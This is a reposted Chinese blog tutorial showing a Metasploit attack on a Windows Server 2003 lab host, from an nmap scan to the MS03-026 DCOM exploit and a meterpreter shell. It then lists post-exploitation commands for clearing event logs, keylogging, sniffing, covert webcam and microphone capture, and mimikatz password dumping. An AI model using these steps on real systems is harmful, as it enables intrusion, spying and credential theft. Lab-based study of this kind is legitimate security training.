0


网络安全kali web安全 Kali之msf简单的漏洞利用

信息收集

靶机的IP地址为:192.168.173.136

利用nmap工具扫描其开放端口、系统等
在这里插入图片描述
整理一下目标系统的相关信息

系统版本:Windows server 2003

开放的端口及服务:

21/tcp       ftp
135/tcp      msrpc
139/tcp      netbios-ssn
445/tcp      microsoft-ds
777/tcp      multiling-http
1025/tcp     NFS-or-IIS
1026/tcp     LSA-or-nterm
1029/tcp     ms-lsa
1030/tcp     iad1
6002/tcp     X11:2
7001/tcp     afs3-callback
7002/tcp     afs3-prserver
8099/tcp     未知服务

漏洞分析

从扫描出的端口发现,目标主机开启了135端口,服务为msrpc(远程过程调用服务),即Windows的RPC服务。

​针对这个服务,我们就可以尝试去利用一下。

漏洞利用

kali机打开Metaspolit:

root@kali:~# msfconsole

查找所有跟Windows RPC相关的漏洞攻击:

msf5 > search dcom

在这里插入图片描述
使用MS-03-026 进行攻击:

msf5 > use exploit/windows/dcerpc/ms03_026_dcom 

为了实施攻击,查看漏洞攻击的选项和条件:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options

在这里插入图片描述
知道攻击所需要的条件,接下来进行设置,只需要设置我们攻击的目标主机即可:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136
RHOSTS => 192.168.174.136

设置好攻击条件之后,接下来就进行攻击:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit 

在这里插入图片描述
执行攻击命令之后,我们获取到了目标主机的shell权限,现在,可以执行命令查看目标主机的一些东西,比如网络配置信息:

meterpreter > ipconfig

在这里插入图片描述
如需进一步攻击利用,可配合其他命令进一步操作。

meterpreter下相关命令

基本系统命令
——————————
shell            进入目标主机cmd shell
reboot            重启目标主机
shutdown        关闭目标主机
sysinfo            查看目标主机系统信息
background        将当前会话放置后台
info            查看已有信息模块
run                执行已有的模块,输入run后按tab键补全,会列出已有的脚本
clearav         清除windows中的应用程序日志、系统日志、安全日志
ipconfig        查看网络配置信息
netstat            查看网络连接信息
getproxy        查看代理信息
route            查看路由
arp                查看arp信息
进程列表:
——————————
getuid            获取系统ID以及计算机名称
getpid            获取当前进程标识符
kill            结束进程
ps                列出正在运行中的进程
鼠标/键盘操作
——————————
keyscan_start    开启按键记录会话
keyscan_stop    终止按键记录会话
keyscan_dump    转储从目标主机捕获到的按键记录
uictl enable mouse         启用鼠标
uictl disable mouse      禁用鼠标
uictl enable keyboard    启用键盘
uictl disable keyboard  禁用键盘
会话
——————————
enumdesktops    列举所有可访问到的桌面和工作站
getdesktop        获取当前Meterpreter桌面
setdesktop        变更Meterpreter当前桌面
嗅探功能
——————————
use sniffer        加载嗅探功能
sniffer_interfaces       查看网卡
sniffer_start    开始对网卡执行嗅探
sniffer_stats    查看状态
sniffer_stop    停止对网卡的嗅探
sniffer_dump    将捕获到的目标主机上的数据转储到本地
摄像头命令
——————————
webcam_list        列举系统所有的摄像头
webcam_snap        使用目标主机摄像头拍照
record_mic        从主机的默认麦克风中记录环境声音
webcam_stream    通过摄像头开启视频
远程桌面/截屏
——————————
enumdesktops    查看可用的桌面
getdesktop        获取当前meterpreter 关联的桌面
set_desktop        设置meterpreter关联的桌面  -h查看帮助
screenshot        截屏
use espia        或者使用espia模块截屏  然后输入screengrab
run vnc            使用vnc远程桌面连接
抓取密码
——————————
load mimikatz    查看帮助
wdigest            获取Wdigest密码
mimikatz_command -f samdump::hashes        执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords
标签: web安全 安全 学习

本文转载自: https://blog.csdn.net/xueshenlaila/article/details/123354467
版权归原作者 极客事纪 所有, 如有侵权,请联系我们删除。

“网络安全kali web安全 Kali之msf简单的漏洞利用”的评论:

还没有评论